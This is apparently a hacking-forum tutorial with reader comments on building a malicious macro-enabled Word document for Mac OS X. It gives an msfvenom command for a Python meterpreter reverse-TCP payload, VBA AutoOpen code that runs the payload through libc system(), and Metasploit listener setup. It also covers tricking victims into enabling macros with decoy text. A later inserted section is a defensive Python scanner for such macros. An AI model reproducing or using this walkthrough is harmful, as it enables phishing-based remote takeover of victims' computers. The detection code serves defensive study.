This tutorial follows the same idea as my original tutorial for Windows, but I've redone it to work with Mac OS X. Here's how to get a meterpreter session from your victim opening a malicious Word document:
Step 1: Creating the Payload
For this tutorial, I'll be using a Python-based payload to be embedded in the Word document. Here's the command to create it:
msfvenom -p python/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 > ~/Desktop/evil.py
As usual, replace the IP address after LHOST with your machine's local IP address. You can find this by typing ifconfig.
Step 2: Adding the Payload to a Word Document
Open a blank document in Word, and save it as a "Macro-Enabled Document".
Next, go to Tools --> Macro --> Macros...
Make sure your document is selected in the "Macros in:" dropdown menu rather than "All active templates and documents", and create a new macro called "AutoOpen".
After clicking "Create", replace the contents of the macro with this VBA code:
Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
system ("python -c ""INSERT_CONTENTS_OF_YOUR_EVIL.PY_FILE_HERE""")
End Sub
Open your evil.py file which we generated in the first step, copy its contents, and put it into the macro. Then, save the document.
Step 3: Set Up Your Listener
Open the Metasploit framework console by typing msfconsole. When it loads, type use multi/handler.
Now, there are a few variables which you need to set: the Payload, the Lhost, and the Lport.
The Payload is python/meterpreter/reverse_tcp, and the Lhost and Lport are the same as what we used in step one. To start the listener, type exploit.
Now, when our malicious document is opened by our victim, we will get a meterpreter session.
Bonus: Social Engineering to Enable Macros
Unfortunately, when our document is downloaded from the internet (presumably through email), Microsoft Word provides a warning to the user about macros.
If the user chooses to disable macros, our malicious code won't run and we won't get a meterpreter session.
In order to convince the user, we'll have to be clever. First, type something like this into the document:
Now, you can add this command into the AutoOpen macro:
Dim ReplacedText As String
ReplacedText = "I do not enjoy computer jokes. Not one bit."
ActiveDocument.Range.Text = ReplacedText
Of course, instead of my terrible pun, you would use the text that the document is supposed to contain, such as an itinerary or a job application.
Now, when the document is opened without macros enabled, the user will be prompted to reopen it with macros enabled. And after they do so, they won't be suspicious because the content of the document changed.
P.S.
Sorry that I haven't posted for a while, I've been busy with school and haven't really gotten a chance to think about computer security. I hope this tutorial is useful and easy to follow, and thank you for reading!
Also, I might come back to this regarding the formatting of the replaced text, since it just gets typed with whatever format was previously used in the document.
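For defenders, the macro built in Step 2 and the bonus section has a recognizable static shape: an auto-run Sub, a Declare that imports a process-spawning function from a .dylib, an interpreter command line, and a rewrite of the document body on open. The Python below is an added example, not code from the original tutorial; it assumes the VBA source has already been extracted from the document as text, goes slightly beyond the page by also matching Document_Open and AutoExec, and its rule names, verdict levels and sample macros are constructed.

```python
import re

# Added defensive example; rule names and sample macros are constructed.
RULES = {
    "auto_exec": re.compile(
        r"^\s*(?:Private\s+|Public\s+)?Sub\s+(AutoOpen|Document_Open|AutoExec)\b", re.I | re.M),
    "native_declare": re.compile(
        r'^\s*(?:Private\s+|Public\s+)?Declare\s+(?:\w+\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"',
        re.I | re.M),
    "interpreter_cmd": re.compile(r"\b(?:python[\d.]*|osascript|bash|sh)\s+-[ce]\b", re.I),
    "body_rewrite": re.compile(r"ActiveDocument\.(?:Range|Content)\.Text\s*=", re.I),
}
SPAWN_FUNCS = {"system", "popen"}  # libc calls that start a process

def normalize(source):
    """Join VBA line continuations (' _') and drop full-line comments."""
    joined = re.sub(r"[ \t]_\r?\n[ \t]*", " ", source)
    return "\n".join(l for l in joined.splitlines() if not l.lstrip().startswith("'"))

def scan_vba(source):
    """Return a verdict plus the rules that fired for one module's source."""
    text = normalize(source)
    hits = {name: rx.findall(text) for name, rx in RULES.items()}
    spawns = [fn for fn, lib in hits["native_declare"]
              if fn.lower() in SPAWN_FUNCS and lib.lower().endswith(".dylib")]
    if hits["auto_exec"] and spawns:
        verdict = "high"      # runs on open AND can start a process
    elif hits["native_declare"] or (hits["auto_exec"] and hits["interpreter_cmd"]):
        verdict = "medium"
    elif hits["auto_exec"] or hits["body_rewrite"]:
        verdict = "low"
    else:
        verdict = "none"
    return {"verdict": verdict, "spawn_imports": spawns,
            "rules": sorted(n for n, h in hits.items() if h)}

SAMPLE_DROPPER = '''Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long
Sub AutoOpen()
system ("python -c ""PLACEHOLDER""")
ActiveDocument.Range.Text = "replacement text"
End Sub'''
SAMPLE_CONTINUED = '''private declare function system _
    lib "libc.dylib" (ByVal command As String) As Long
Sub Document_Open()
End Sub'''
SAMPLE_BENIGN = '''' Declare Function system Lib "libc.dylib" (disabled experiment)
Sub FormatTable()
    Selection.Font.Bold = True
End Sub'''
```

A "high" verdict is a triage signal for quarantining the attachment and reviewing the module by hand; string matching like this misses obfuscated or dynamically built declarations.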
7 Comments
hey code, nice how-to
can we do this for windows too? (from windows 7 to 10)
-D3ATH
Thanks!
Yeah for sure, check out my windows tutorial here: https://null-byte.wonderhowto.com/how-to/create-obfuscate-virus-inside-microsoft-word-document-0167780/
Hey code, I enjoyed your article.
However, it seems like Microsoft Word is refusing to run the python script. I ensured my settings were correct by just running the script, and did get a meterpreter session. I even tried to run just the python script segment of code inside of word with no luck.
Curious if you had this issue, and how you worked around it.
-Typhoon
Hi Kev,
It seems like a possibility might be that macros are disabled in your Microsoft Word settings. In Windows, this is easy to change, but in the Mac OS version this is the only option I have found: Word --> Preferences --> Security --> Uncheck "Warn before opening a file that contains macros". I'm honestly not sure if this will work, but it's the only option under "Macro Security" so it's my best guess for now.
I hope this fixes your problem,
~ Code
Hi CODE who can I see you in fb?
Can you guys please help me, I tried to do this on the new and old version of word but every time I try to compile it, it just comes up with invalid use of property. If anyone knows how to fix this please tell me.
Can't get libc.dylib working.
I changed the code because of 64bit system to:
unfortunately I get:
Microsoft Visual Basic
Error 453
Could not finde file: libc.dylib
I found the file in /usr/lib/ so it is not missing
how do I have to change the code to get it working?
I use OSX high sierra 10.13.3 and MS Word 15.34